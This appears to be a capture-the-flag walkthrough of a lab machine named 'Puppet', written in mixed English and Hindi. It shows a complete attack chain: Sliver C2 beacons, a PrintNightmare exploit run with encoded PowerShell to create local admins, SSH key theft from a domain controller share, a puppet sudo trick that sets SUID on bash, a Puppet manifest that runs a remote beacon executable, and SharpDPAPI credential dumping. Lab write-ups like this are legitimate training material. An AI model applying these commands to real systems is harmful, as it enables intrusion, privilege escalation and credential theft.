Puppet - Advance Lab

https://github.com/nemo-wq/PrintNightmare-CVE-2021-34527

1st

sudo nmap -sV -T3 -vvv -sC 10.13.38.33

Scanning 10.13.38.33 [1000 ports]
Discovered open port 22/tcp on 10.13.38.33
Discovered open port 21/tcp on 10.13.38.33
Discovered open port 31337/tcp on 10.13.38.33
Discovered open port 8443/tcp on 10.13.38.33
Completed SYN Stealth Scan at 19:06, 2.01s elaps

2nd

do anonymous login in ftp and download the files via mget (turn on passive mode as well)

ftp 10.13.38.33              
Connected to 10.13.38.33.
220 (vsFTPd 3.0.5)
Name (10.13.38.33:sher): Anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw----r--    1 0        0            2119 Oct 11  2024 red_127.0.0.1.cfg
-rwxr-xr-x    1 0        0        36515304 Oct 12  2024 sliver-client_linux

ftp> passive
Passive mode on.
ftp> get sliver-client_linux
227 Entering Passive Mode (10,13,38,33,50,76).
150 Opening BINARY mode data connection for sliver-client_linux (36515304 bytes).
226 Transfer complete.
36515304 bytes received in 22.7073 seconds (1.5336 Mbytes/s)

-rw----r--    1 0        0            2119 Oct 11  2024 red_127.0.0.1.cfg
-rwxr-xr-x    1 0        0        36515304 Oct 12  2024 sliver-client_linux

3rd

now examine the downloded files before running the linux client file change the certificate lhost ip to terget ip then import it into the linux-client file

sudo nano red_127.0.0.1.cfg

 ~ ................................................................................................................................................................................................. 10s | 19:52:38 
> ./sliver-client_linux          
No config files found at /home/sher/.sliver-client/configs (see --help)

 ~ ....................................................................................................................................................................................................... 19:52:46 
> ./sliver-client_linux import red_127.0.0.1.cfg 
2025/10/24 19:53:00 Saved new client config to: /home/sher/.sliver-client/configs/red_10.13.38.33.cfg

 ~ ....................................................................................................................................................................................................... 19:53:00 
> ls
codetwopart     Desktop    Downloads   hash.txt  Music     powerlevel10k  pycve              rockyou.txt  sliver-client_linux  Templates  Z2Rh.php
CVE-2025-31161  Documents  exploit.py  ikeforce  Pictures  Public         red_127.0.0.1.cfg  rofi         strap.sh             Videos

 ~ ....................................................................................................................................................................................................... 19:53:03 
> ./sliver-client_linux

4th

https://sliver.sh/docs?name=Configuration+Files - Read Documentation

sliver > implants

 Name               Implant Type   Template   OS/Arch             Format   Command & Control                Debug 
================== ============== ========== =============== ============ ================================ =======
 CONCEPTUAL_SHARK   beacon         sliver     windows/amd64   EXECUTABLE   [1] mtls://172.16.40.50:443      false 
 SHORT_COUGAR       beacon         sliver     windows/amd64   EXECUTABLE   [1] mtls://[ip]:443              false 
 puppet-mtls        beacon         sliver     windows/amd64   EXECUTABLE   [1] mtls://pm01.puppet.vl:8443   false 
 win                session        sliver     windows/amd64   EXECUTABLE   [1] mtls://pm01.puppet.vl:8443   fal

sliver >beacons
 ID         Name          Tasks   Transport   Remote Address       Hostname   Username                   Operating System   Locale   Last Check-N Next Check-In                                  
========== ============= ======= =========== ==================== ========== ========================== ================== ======== ================================================ ================================================
 998a2bd1   puppet-mtls   0/8     mtls        172.16.40.50:49945   File01     PUPPET\bruce.smith         windows/amd64      en-US    Wed Apr 23 12:27:35 IST 2025 (4424h26m52s ago)   Wed Apr 23 12:28:06 IST 2025 (4424h26m21s ago) 
 00c8f7d1   puppet-mtls   1/2     mtls        172.16.40.50:49735   File01     PUPPET\bruce.smith         windows/amd64      en-US    Fri Oct 24 19:05:59 IST 2025 (1h48m28s ago)      Fri Oct 24 19:06:29 IST 2025 (1h47m58s ago)    
 893840a3   puppet-mtls   4/5     mtls        172.16.40.50:49734   File01     PUPPET\bruce.smith         windows/amd64      en-US    Fri Oct 24 19:06:02 IST 2025 (1h48m25s ago)      Fri Oct 24 19:06:32 IST 2025 (1h47m55s ago)    
 3055c4a6   puppet-mtls   0/1     mtls        172.16.40.50:49738   File01     PUPPET\bruce.smith         windows/amd64      en-US    Fri Oct 24 19:05:58 IST 2025 (1h48m29s ago)      Fri Oct 24 19:06:29 IST 2025 (1h47m58s ago)    
 d9c0406d   puppet-mtls   0/1     mtls        172.16.40.50:49737   File01     PUPPET\bruce.smith         windows/amd64      en-US    Fri Oct 24 19:05:54 IST 2025 (1h48m33s ago)      Fri Oct 24 19:06:25 IST 2025 (1h48m2s ago)     
 0b9b944a   puppet-mtls   5/7     mtls        172.16.40.50:49736   File01     PUPPET\bruce.smith         windows/amd64      en-US    Fri Oct 24 19:06:03 IST 2025 (1h48m24s ago)      Fri Oct 24 19:06:34 IST 2025 (1h47m53s ago)    
 56507bdb   puppet-mtls   1/3     mtls        172.16.40.50:51293   File01     <err>                      windows/amd64      en-US    Fri Oct 24 19:05:29 IST 2025 (1h48m58s ago)      Fri Oct 24 19:05:59 IST 2025 (1h48m28s ago)    
 80c28b90   puppet-mtls   3/7     mtls        172.16.40.50:51622   File01     NT AUTHORITY\SYSTEM        windows/amd64      en-US    Fri Oct 24 19:05:19 IST 2025 (1h49m8s ago)       Fri Oct 24 19:05:51 IST 2025 (1h48m36s ago)    
 f27de2c0   puppet-mtls   3/5     mtls        172.16.40.50:52895   File01     PUPPET\svc_puppet_win_t1   windows/amd64      en-US    Fri Oct 24 19:05:21 IST 2025 (1h49m6s ago)       Fri Oct 24 19:05:52 IST 2025 (1h48m35s ago)    
 b4ea9f29   puppet-mtls   0/0     mtls        172.16.40.50:53028   File01     PUPPET\bruce.smith         windows/amd64      en-US    Fri Oct 24 20:54:24 IST 2025 (3s ago)            Fri Oct 24 20:54:55 IST 2025 (in 28s)          
 52a40569   puppet-mtls   0/0     mtls        172.16.40.50:53029   File01     PUPPET\bruce.smith         windows/amd64      en-US    Fri Oct 24 20:53:55 IST 2025 (32s ago)           Fri Oct 24 20:54:25 IST 2025 (2s ago)          
 da5ed63c   puppet-mtls   1/1     mtls        172.16.40.50:53033   File01     PUPPET\bruce.smith         windows/amd64      en-US    Fri Oct 24 20:54:17 IST 2025 (10s ago)           Fri Oct 24 20:54:49 IST 2025 (in 22s)          
 0d55df62   puppet-mtls   0/0     mtls        172.16.40.50:53035   File01     PUPPET\bruce.smith         windows/amd64      en-US    Fri Oct 24 20:53:58 IST 2025 (29s ago)           Fri Oct 24 20:54:28 IST 2025 (in 1s)           
 ba510ced   puppet-mtls   0/0     mtls        172.16.40.50:53036   File01     PUPPET\bruce.smith         windows/amd64      en-US    Fri Oct 24 20:54:23 IST 2025 (4s ago)            Fri Oct 24 20:54:54 IST 2025 (in 27s)

now check which one is active and use the particular one

liver > use

? Select a session or beacon:  [Use arrows to move, type to filter]
  BEACON   56507bdb  puppet-mtls  172.16.40.50:51293  File01  <err>                     windows/amd64
  BEACON   80c28b90  puppet-mtls  172.16.40.50:51622  File01  NT AUTHORITY\SYSTEM       windows/amd64
  BEACON   893840a3  puppet-mtls  172.16.40.50:49734  File01  PUPPET\bruce.smith        windows/amd64
> BEACON   998a2bd1  puppet-mtls  172.16.40.50:49945  File01  PUPPET\bruce.smith        windows/amd64
  BEACON   b4ea9f29  puppet-mtls  172.16.40.50:53028  File01  PUPPET\bruce.smith        windows/amd64
  BEACON   ba510ced  puppet-mtls  172.16.40.50:53036  File01  PUPPET\bruce.smith        windows/amd64
  BEACON   d9c0406d  puppet-mtls  172.16.40.50:49737  File01  PUPPET\bruce.smith        windows/amd64
[!] no selection

sliver > use 0d55df62

[*] Active beacon puppet-mtls (0d55df62-c84d-48ce-9771-b5d5cc7cd1d6)

sliver (puppet-mtls) > pwd

[*] Tasked beacon puppet-mtls (a2cb8fe2)

sliver (puppet-mtls) > interactive

[*] Using beacon's active C2 endpoint: mtls://pm01.puppet.vl:8443
[*] Tasked beacon puppet-mtls (7b691e96)

[*] Session 7b96620a puppet-mtls - 172.16.40.50:54392 (File01) - windows/amd64 - Fri, 24 Oct 2025 20:56:05 IST

[+] puppet-mtls completed task a2cb8fe2

[*] C:\Windows\system32

sliver (puppet-mtls) > use 7b96620a (active device)

[*] Active session puppet-mtls (7b96620a-d54f-4e31-a1b4-b8e05212e678)

now you are logged into the user now check

C/Users/bruce.smith/Desktop/user.flag.txt         1st-flag

PUPPET{1c1740d66f707111a911e5f6a96d7d36}

EXTRA : Shell - directly execute commands in Powerpoint
        interactive -  to create a session to perform commands like (ls,cd)
        implants - piece of code when executed on a target sends back reverse connection
        Use - to use the created or already existing session
        
        sessions: FOR direct command outout and input
        beacons : koi session active hae ya nahi

5th ;

from here the next clue you get is the name : Nightmare which is a type of CVE in which we become an local admin i.e we get privillage execute commands that a local user cant use

https://github.com/JohnHammond/CVE-2021-34527

This is a remote code execution vulnerability that can be used to obtain SYSTEM level privileges by an authenticated remote user against Windows machines running the print spooler service. An attacker could then use that access to create new accounts, attempt to install programs; view, change, or delete data; or create new accounts with full user rights.

This vulnerability exists due to an authorisation bypass bug in the Print Spooler service spoolsv.exe on Windows systems, which allows authenticated remote users to install print drivers using the RPC call RpcAddPrinterDriver and specify a driver file located on a remote location. A malicious user exploiting this could obtain SYSTEM level privileges on a Windows system running this service by injecting malicious DLLs as part of installing a print driver.

6th :

after importing the CVE ,we


sliver (puppet-mtls) > sharpsh -i -s -t 200 -- -u C:\\Users\\bruce.smith\\Desktop\\CVE-2021-34527.ps1 -e -c SQBuAHYAbwBrAGUALQBOAGkAZwBoAHQAbQBhAHIAZQAgAC0ARAByAGkAdgBlAHIATgBhAG0AZQAgACIATABtAGEAbwBqAGkAIgAgAC0ATgBlAHcAVQBzAGUAcgAgACIAawBhAGQAZAB1ACIAIAAtAE4AZQB3AFAAYQBzAHMAdwBvAHIAZAAgACIAUABhAHMAcwB3AG8AcgBkADEAMgAzACIACgA= SQBuAHYAbwBrAGUALQBOAGkAZwBoAHQAbQBhAHIAZQAgAC0ARAByAGkAdgBlAHIATgBhAG0AZQAgACIAWABlAHIAbwB4ADMAMAAxADAAIgAgAC0ATgBlAHcAVQBzAGUAcgAgACIAVABvAG8AdABoAGwAZQBzAHMANQAxADQAMwAiACAALQBOAGUAdwBQAGEAcwBzAHcAbwByAGQAIAAiAFAAYQBzAHMAdwBvAHIAZAAxADIAMwAiAA==

here we are using sharpsh tool to use the shell in a way that we
,dont get caught as we are red teaming here, the ,this tool helps 
up to execute command in shell to create a local admin through which 
we'll get in and use the desired privillage we are looking for ..

Output :

sliver (puppet-mtls) > sharpsh -i -s -t 200 -- -u C:\\Users\\bruce.smith\\Desktop\\CVE-2021-34527.ps1 -e -c SQBuAHYAbwBrAGUALQBOAGkAZwBoAHQAbQBhAHIAZQAgAC0ARAByAGkAdgBlAHIATgBhAG0AZQAgACIATABtAGEAbwBqAGkAIgAgAC0ATgBlAHcAVQBzAGUAcgAgACIAawBhAGQAZAB1ACIAIAAtAE4AZQB3AFAAYQBzAHMAdwBvAHIAZAAgACIAUABhAHMAcwB3AG8AcgBkADEAMgAzACIACgA=

? Do you want to continue? Yes
 ⠋  Executing sharpsh -u CVE-2021-34527.ps1 -e -c SQBuAHYAbwBrAGUALQBOAGkAZwBoAHQAbQBhAHIAZQAgAC0ARAByAGkAdgBlAHIATgBhAG0AZQAgACIAWABlAHIAbwB4ADMAMAAxADAAIgAgAC0ATgBlAHcAVQBzAGUAcgAgACIAVABvAG8AdABoAGwAZQBzAHMANQA ⠙  Executing sharpsh -u CVE-2021-34527.ps1 -e -c SQBuAHYAbwBrAGUALQBOAGkAZwBoAHQAbQBhAHIAZQAgAC0ARAByAGkAdgBlAHIATgBhAG0AZQAgACIAWABlAHIAbwB4ADMAMAAxADAAIgAgAC0ATgBlAHcAVQBzAGUAcgAgACIAVABvAG8AdABoAGwAZQBzAHMANQA ⠹  Executing sharpsh -u CVE-2021-34527.ps1 -e -c SQBuAHYAbwBrAGUALQBOAGkAZwBoAHQAbQBhAHIAZQAgAC0ARAByAGkAdgBlAHIATgBhAG0AZQAgACIAWABlAHIAbwB4ADMAMAAxADAAIgAgAC0ATgBlAHcAVQBzAGUAcgAgACIAVABvAG8AdABoAGwAZQBzAHMANQA ⠸  Executing sharpsh -u CVE-2021-34527.ps1 -e -c SQBuAHYAbwBrAGUALQBOAGkAZwBoAHQAbQBhAHIAZQAgAC0ARAByAGkAdgBlAHIATgBhAG0AZQAgACIAWABlAHIAbwB4ADMAMAAxADAAIgAgAC0ATgBlAHcAVQBzAGUAcgAgACIAVABvAG8AdABoAGwAZQBzAHMANQA ⠼  Executing sharpsh -u CVE-2021-34527.ps1 -e -c SQBuAHYAbwBrAGUALQBOAGkAZwBoAHQAbQBhAHIAZQAgAC0ARAByAGkAdgBlAHIATgBhAG0AZQAgACIAWABlAHIAbwB4ADMAMAAxADAAIgAgAC0ATgBlAHcAVQBzAGUAcgAgACIAVABvAG8AdABoAGwAZQBzAHMANQA ⠴  Executing sharpsh -u CVE-2021-34527.ps1 -e -c SQBuAHYAbwBrAGUALQBOAGkAZwBoAHQAbQBhAHIAZQAgAC0ARAByAGkAdgBlAHIATgBhAG0AZQAgACIAWABlAHIAbwB4ADMAMAAxADAAIgAgAC0ATgBlAHcAVQBzAGUAcgAgACIAVABvAG8AdABoAGwAZQBzAHMANQA ⠦  Executing sharpsh -u CVE-2021-34527.ps1 -e -c SQBuAHYAbwBrAGUALQBOAGkAZwBoAHQAbQBhAHIAZQAgAC0ARAByAGkAdgBlAHIATgBhAG0AZQAgACIAWABlAHIAbwB4ADMAMAAxADAAIgAgAC0ATgBlAHcAVQBzAGUAcgAgACIAVABvAG8AdABoAGwAZQBzAHMANQA ⠧  Executing sharpsh -u CVE-2021-34527.ps1 -e -c SQBuAHYAbwBrAGUALQBOAGkAZwBoAHQAbQBhAHIAZQAgAC0ARAByAGkAdgBlAHIATgBhAG0AZQAgACIAWABlAHIAbwB4ADMAMAAxADAAIgAgAC0ATgBlAHcAVQBzAGUAcgAgACIAVABvAG8AdABoAGwAZQBzAHMANQA ⠇  Executing sharpsh -u CVE-2021-34527.ps1 -e -c SQBuAHYAbwBrAGUALQBOAGkAZwBoAHQAbQBhAHIAZQAgAC0ARAByAGkAdgBlAHIATgBhAG0AZQAgACIAWABlAHIAbwB4ADMAMAAxADAAIgAgAC0ATgBlAHcAVQBzAGUAcgAgACIAVABvAG8AdABoAGwAZQBzAHMANQA ⠏  Executing sharpsh -u CVE-2021-34527.ps1 -e -c SQBuAHYAbwBrAGUALQBOAGkAZwBoAHQAbQBhAHIAZQAgAC0ARAByAGkAdgBlAHIATgBhAG0AZQAgACIAWABlAHIAbwB4ADMAMAAxADAAIgAgAC0ATgBlAHcAVQBzAGUAcgAgACIAVABvAG8AdABoAGwAZQBzAHMANQA ⠋  Executing sharpsh -u CVE-2021-34527.ps1 -e -c SQBuAHYAbwBrAGUALQBOAGkAZwBoAHQAbQBhAHIAZQAgAC0ARAByAGkAdgBlAHIATgBhAG0AZQAgACIAWABlAHIAbwB4ADMAMAAxADAAIgAgAC0ATgBlAHcAVQBzAGUAcgAgACIAVABvAG8AdABoAGwAZQBzAHMANQA[*] sharpsh output:

[*] Output saved to /tmp/sharpsh_File012761936476.log

now your local admin acc is ready = kaddu : Password123

7th :

now after running sharpsh you have created the user and now we will use it to create a beacon using our local admin account using “runas” tool


sliver (puppet-mtls) > runas -u amulpaaji -P "Lmao123@" -p "C:\\ProgramData\\puppet\\puppet-update.exe"

[*] Successfully ran C:\ProgramData\puppet\puppet-update.exe  on puppet-mtls

[*] Beacon 236ee961 puppet-mtls - 172.16.40.50:53412 (File01) - windows/amd64 - Mon, 27 Oct 2025 19:26:34 IST

[*] red has joined the game

[*] Beacon b5f4b2aa puppet-mtls - 172.16.40.50:53646 (File01) - windows/amd64 - Mon, 27 Oct 2025 19:38:07 IST

8th :

RawLdap queries

https://github.com/Flangvik/SharpCollection/blob/master/NetFramework_4.7_x64/ADSearch.exe

from here you’ll get ADsearch.exe file and then you can execute your query which will be executed and (0-0) nobodys gonna know .

The concept here is called “Living off the Land” in which the attacker uses tools are present in the windows already and no external tool is used by attacker.

9th :

after getting into session

10th ;

we will need to know whos the domain controller for that we we command

Reflective loading - Reflective loading is a fileless code execution technique used in offensive security (and red teaming) to load a binary (usually a DLL or PE) directly into memory without writing it to disk.

execute-assembly -p explorer.exe '/home/sher/Dowmloads' '--search "(ObjectCategory=Computer)"'

[*] Output:

    ___    ____  _____                      __  
   /   |  / __ \/ ___/___  ____ ___________/ /_ 
  / /| | / / / /\__ \/ _ \/ __ `/ ___/ ___/ __ \
 / ___ |/ /_/ /___/ /  __/ /_/ / /  / /__/ / / /
/_/  |_/_____//____/\___/\__,_/_/   \___/_/ /_/  
                                           
Twitter: @tomcarver_
GitHub: @tomcarver16
            
[*] No domain supplied. This PC's domain will be used instead
[*] LDAP://DC=puppet,DC=vl
[*] CUSTOM SEARCH: 
[*] TOTAL NUMBER OF SEARCH RESULTS: 3
	[+] cn : **DC01**
	[+] cn : FILE01
	[+] cn : PUPPET

here you get the domain controller name DC01.

11th :

armory install sa-netshares

[*] Installing extension 'sa-netshares' (v0.0.23) ... done!

sliver (puppet-mtls) > sa-netshares DC01

[*] Successfully executed sa-netshares (coff-loader)
[*] Got output:
Share: 
---------------------DC01----------------------------------
ADMIN$
C$
IPC$
**it**
NETLOGON
SYSVOL

here after search and download the private and public key in public key you will get the user ID.

Now unzip the downloaded file :

tar -xvf puppet-mtls_download_DC01_it_ssh_1761578564.tar.gz

Username : [email protected]%

12th :

here the private key is in DOS format so for ssh login we need to convert it into the unix format so we will do and give it permisson as well

command :  dos2unix DC01/it/.ssh/ed25519
dos2unix: converting file DC01/it/.ssh/ed25519 to Unix format...done

command : chmod 600 ed25519

13th :

now here we will also have to crack the password with the private key file which ultimately lands to the password “puppet’ and now you can ssh login and find the password in root

ssh '[email protected]'@10.13.38.33 -i ed25519
 
password : puppet

14th :

now we will need to know what sudo execution perm we have so we do this

sudo -l

15th :

sudo: unable to resolve host puppet.puppet.vl: Temporary failure in name resolution
Matching Defaults entries for [email protected] on puppet:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User [email protected] may run the following commands on puppet:
    (**ALL) NOPASSWD: /usr/bin/puppet**

16th :

from here we put a payload from https://gtfobins.github.io/gtfobins/puppet/ which is a sudo payload and get the root

sudo /usr/bin/puppet apply -e "exec { '/bin/sh -c \"chmod u+s /bin/bash\"': }"

bash-5.1$ /bin/bash -p
bash-5.1# ls
bin   dev  home  lib32	libx32	   media  opt	root  sbin  srv  tmp  var
boot  etc  lib	lib64	lost+found  mnt    proc  run   snap  sys  usr
bash-5.1# cd root
bash-5.1# ls
flag.txt  snap
bash-5.1# cat flag.txt
**PUPPET{c093652c9a73eaee0b43e039a04eff77}**

17th :

BECONS KO FIL01 KE SHARE MAI DAL DIYA SO THAT HAM USKI DCO1 SE ACCESS KAR SAKE AND HAMAY WAHASE CONNECTION MIL JAYE

NOW we will execute this command in our LOCAL ADMINS SHELL AND LEAVE IT AS 
IT IS TO CAPTURE BEACON

PS C:\Windows> cp C:\\programdata\\puppet\\puppet-update.exe \\file01.puppet.vl\files\shell.exe

18th :

AB HAM SSH LOGIN KARENGE WITH ID PASSWORD JOKI DC01 DIRECTORY MAI THA

ISS DIRECTORY MAI JAKAR

cd /home/sher/DC01/it/.ssh

ssh '[email protected]'@10.13.38.33 -i ed25519

NEXT COMMAND TO CREATE DIRECTORY FOR THE MANIFEST FILE .(file joki batayega system ko ki kya karna hai ) uske pehle aapko root ban na hai uske liye bhi code hai

Root command :

1.) sudo /usr/bin/puppet apply -e "exec { '/bin/sh -c \"chmod u+s /bin/bash\"': }"

2.) /bin/bash -p

 Main command : mkdir -p /etc/puppet/code/environments/production/manifests

AB US DIRECTORY MAI HAM APNI FILE BANAYENGE amal.pp naam ki jisme ham vo manifest ka data save karenge :

nano /etc/puppet/code/environments/production/manifests/amul.pp

code :

node 'dc01.puppet.vl' {
  exec { 'amulji':
    command   => 'C:\\Windows\\System32\\cmd.exe /c \\\\file01.puppet.vl\\files\\shell.exe',
    logoutput => true,
  }
}
node default {
  notify { 'dudu piyenge hum to dudu piyenge': }
}

AND NOW AB HAM USSE RUN KARENE KE LIYE PUPPET MAI APPLY KARENGE AUR HAMAY WAHA BEACON MIL JAYEGA LOCAL ADMIN KE COMMAND SHELL PE

NOW YOUR WORK IS DONE HERE…GO ON THE LOCAL ADMIN TERMINAl and wait for some some you’ll get the BEACON.

19th :

Now use the beacon -

PS C:\Windows> cp C:\\programdata\\puppet\\puppet-update.exe \\file01.puppet.vl\files\shell.exe
cp C:\\programdata\\puppet\\puppet-update.exe \\file01.puppet.vl\files\shell.exe
[*] Beacon f6d83cf7 puppet-mtls - 172.16.40.5:55442 (DC01) - windows/amd64 - Tue, 28 Oct 2025 18:03:48 IST

now use this command to check ki tum admin bane ya nahi

NOW WE WILL USE sharodpai tool TO GET THE PASSWORD DUMP

sliver (puppet-mtls) > armory install sharpdpapi 

[*] Installing alias 'SharpDPAPI' (v0.0.4) ... done!

sliver (puppet-mtls) > sharpdpapi machinetriage

AND YOU GET THE PASSWORD HERE

__                 _   _       _ ___ 
 (_  |_   _. ._ ._  | \ |_) /\  |_) |  
 __) | | (_| |  |_) |_/ |  /--\ |  _|_ 
                |                      
  v1.12.0                               

[*] Action: Machine DPAPI Credential, Vault, and Certificate Triage

[*] Elevating to SYSTEM via token duplication for LSA secret retrieval
[*] RevertToSelf()

[*] Secret  : DPAPI_SYSTEM
[*]    full: F55461801C15D867EA56A3BF183977FA6301E601CD30040C9B9008515A1855D614A6831EF1986886
[*]    m/u : F55461801C15D867EA56A3BF183977FA6301E601 / CD30040C9B9008515A1855D614A6831EF1986886

[*] SYSTEM master key cache:

{154c35ab-34b7-4919-ad12-9f75c53de887}:8C681F5144105BF6DB9972A205EBF03899204666
{16ce0746-d7db-4885-9b77-d1418640bfce}:0779112B7A1588F460A7A55723A2D508169C447F
{1762fb49-daaa-41a5-b777-67d3ceae8f8d}:0C4B09075E42E044C01E8FF01A704F8C9802C989
{5e9b6029-22ff-4a5b-ab30-f889a97ee8f5}:917DBE566921755FABA571EA534EE5DFBC153E90
{8166ddb2-5224-403e-8a1a-4d02295bdd8a}:11A80EA8DD93C2DD164FC23DF43357AD2E535C39
{63ae5891-bded-4f6b-8c36-f43f1b65738c}:14E5EF96E960355395231657A3951F89FCC17A14
{6cdf826d-e866-4710-ab78-a891d59e20ef}:DFA4DE570ABE63125B03088A6C5C91B77C74DA42
{c21bc15e-f014-4edb-bbb9-f98b326a25ee}:790A4BCC5D80C3715E4DB102529FC56A799CCF38
{e2de4c34-3c46-411f-91cb-ab2c9cd2f205}:8819EE03468A4B376AE0FD5EBAEE4471F7AACE80

[*] Triaging System Credentials

Folder       : C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials

  CredFile           : 39FAB9BA3A19E88594B1D50B5E44AAA4

    guidMasterKey    : {63ae5891-bded-4f6b-8c36-f43f1b65738c}
    size             : 592
    flags            : 0x20000000 (CRYPTPROTECT_SYSTEM)
    algHash/algCrypt : 32782 (CALG_SHA_512) / 26128 (CALG_AES_256)
    description      : Local Credential Data

    LastWritten      : 4/22/2025 11:43:03 PM
    TargetName       : Domain:batch=TaskScheduler:Task:{ACFD7F3B-51A4-4B11-8428-F287E956EC4C}
    TargetAlias      : 
    Comment          : 
    UserName         : PUPPET\root
    **Credential       : PUPPET{8b6626457fbee7a7e2b74a2aa6754aa9}**

Folder       : C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Credentials

  CredFile           : DFBE70A7E5CC19A398EBF1B96859CE5D

    guidMasterKey    : {e2de4c34-3c46-411f-91cb-ab2c9cd2f205}
    size             : 11152
    flags            : 0x20000000 (CRYPTPROTECT_SYSTEM)
    algHash/algCrypt : 32782 (CALG_SHA_512) / 26128 (CALG_AES_256)
    description      : Local Credential Data

    LastWritten      : 10/11/2024 4:41:20 AM
    TargetName       : WindowsLive:target=virtualapp/didlogical
    TargetAlias      : 
    Comment          : PersistedCredential
    UserName         : 02ytgtluvuhenccp
    Credential       : 

[*] Triaging SYSTEM Vaults

[*] Triaging Vault folder: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28

  VaultID            : 4bf4c442-9b8a-41a0-b380-dd4a704ddb28
  Name               : Web Credentials
    guidMasterKey    : {e2de4c34-3c46-411f-91cb-ab2c9cd2f205}
    size             : 324
    flags            : 0x20000000 (CRYPTPROTECT_SYSTEM)
    algHash/algCrypt : 32782 (CALG_SHA_512) / 26128 (CALG_AES_256)
    description      : 
    aes128 key       : A113FA12CFC64ED9E364C8081C35FE9D
    aes256 key       : 35FAC2A34A19C881EDCAE715403D05E931F56F93C283188CF3D37D6567B2CA88

[*] Triaging System Certificates

Folder       : C:\ProgramData\Microsoft\Crypto\RSA\MachineKeys

Folder       : C:\ProgramData\Microsoft\Crypto\SystemKeys

Folder       : C:\Windows\ServiceProfiles\LocalService\AppData\Roaming\Microsoft\Crypto\Keys

[*] Retrieving SCCM Network Access Account blobs via WMI
[*]     Connecting to \\localhost\root\ccm\policy\Machine\ActualConfig
[!] Error connecting to WMI: Invalid namespace 

SharpDPAPI completed in 00:00:01.1716013

[*] Beacon 8db0fcdd puppet-mtls - 172.16.40.5:55472 (DC01) - windows/amd64 - Tue, 28 Oct 2025 18:09:00 IST

[*] Beacon 7356f0f4 puppet-mtls - 172.16.40.5:55510 (DC01) - windows/amd64 - Tue, 28 Oct 2025 18:14:12 IST

[*] Beacon c174cb97 puppet-mtls - 172.16.40.5:55560 (DC01) - windows/amd64 - Tue, 28 Oct 2025 18:19:23 IST

[*] Beacon 771308b4 puppet-mtls - 172.16.40.5:55618 (DC01) - windows/amd64 - Tue, 28 Oct 2025 18:24:36 IST

[*] Beacon 4356647b puppet-mtls - 172.16.40.5:55683 (DC01) - windows/amd64 - Tue, 28 Oct 2025 18:29:48 IST

[*] Beacon 9469ad2d puppet-mtls - 172.16.40.5:55763 (DC01) - windows/amd64 - Tue, 28 Oct 2025 18:35:01 IST

[*] Beacon a6d656a3 puppet-mtls - 172.16.40.5:55848 (DC01) - windows/amd64 - Tue, 28 Oct 2025 18:40:13 IST

[*] Beacon ead8bd56 puppet-mtls - 172.16.40.5:55945 (DC01) - windows/amd64 - Tue, 28 Oct 2025 18:45:25 IST

[*] Beacon 6473c0e5 puppet-mtls - 172.16.40.5:56051 (DC01) - windows/amd64 - Tue, 28 Oct 2025 18:50:36 IST

[*] Beacon a093468f puppet-mtls - 172.16.40.5:56168 (DC01) - windows/amd64 - Tue, 28 Oct 2025 18:55:48 IST

Credential       : PUPPET{8b6626457fbee7a7e2b74a2aa6754aa9}

PEL DIYA PUPPET KO BC …

PreviousExpressway - Easy NextGiveBack - Medium

Last updated 3 hours ago

Was this helpful?